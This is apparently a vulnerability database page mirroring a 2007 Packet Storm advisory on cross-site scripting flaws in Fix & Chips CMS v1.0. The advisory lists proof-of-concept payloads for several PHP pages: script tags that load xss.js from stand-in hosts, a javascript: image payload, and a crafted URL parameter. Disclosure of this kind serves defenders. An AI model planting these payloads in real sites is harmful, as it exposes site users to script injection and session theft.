Lucene search
K

fcCMS10-xss.txt

🗓️ 13 Jan 2007 00:00:00Reported by LunyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Fix & Chips CMS v1.0 has XSS vulnerabilities in staff.php, delete-announce.php, and new-customer.php allowing execution of malicious user input

Code
`Fix & Chips CMS v1.0  
  
http://software.fixnchipsit.com/  
  
Vulnerable files:  
  
staff.php  
delete-announce.php  
new-customer.php  
search.php  
client-results.php  
--------------------------------------------  
  
staff.php XSS  
User input in the Announcement box isn't properly sanatized before being generated.  
  
A few PoC's that work:  
  
<SCRIPT SRC=http://somesite.com/xss.js></SCRIPT>  
  
<IMG SRC=javascript:alert("XSS")>  
  
----------------------------------------------  
  
delete-announce.php XSS  
  
http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/xss.js></SCRIPT>  
  
-------------------------------------------------  
new-customer.php  
  
User input in all of the input boxes when adding a new customer isnt sanatized. For a PoC in any input box when adding a new   
  
client put:  
  
<SCRIPT SRC=http://example.com/xss.js></SCRIPT>  
  
Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.  
  
------------------------------------------------  
  
- Luny  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation